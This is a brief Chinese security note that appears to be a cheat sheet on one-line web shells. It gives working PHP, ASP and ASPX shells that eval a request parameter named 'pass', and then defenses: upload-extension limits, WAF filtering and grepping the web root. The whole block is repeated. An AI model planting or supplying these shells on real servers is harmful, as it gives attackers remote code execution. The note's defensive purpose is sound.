php <?php @eval($_post['pass']);?>
asp <%eval request ("pass")%>
aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
防御
代码中过滤。限制上传文件的后缀名
waf过滤
检查是否存在一句话木马。fgrep -R '一句话木马代码' /var/www/xxx
php <?php @eval($_post['pass']);?>
asp <%eval request ("pass")%>
aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
防御
代码中过滤。限制上传文件的后缀名
waf过滤
检查是否存在一句话木马。fgrep -R '一句话木马代码' /var/www/xxx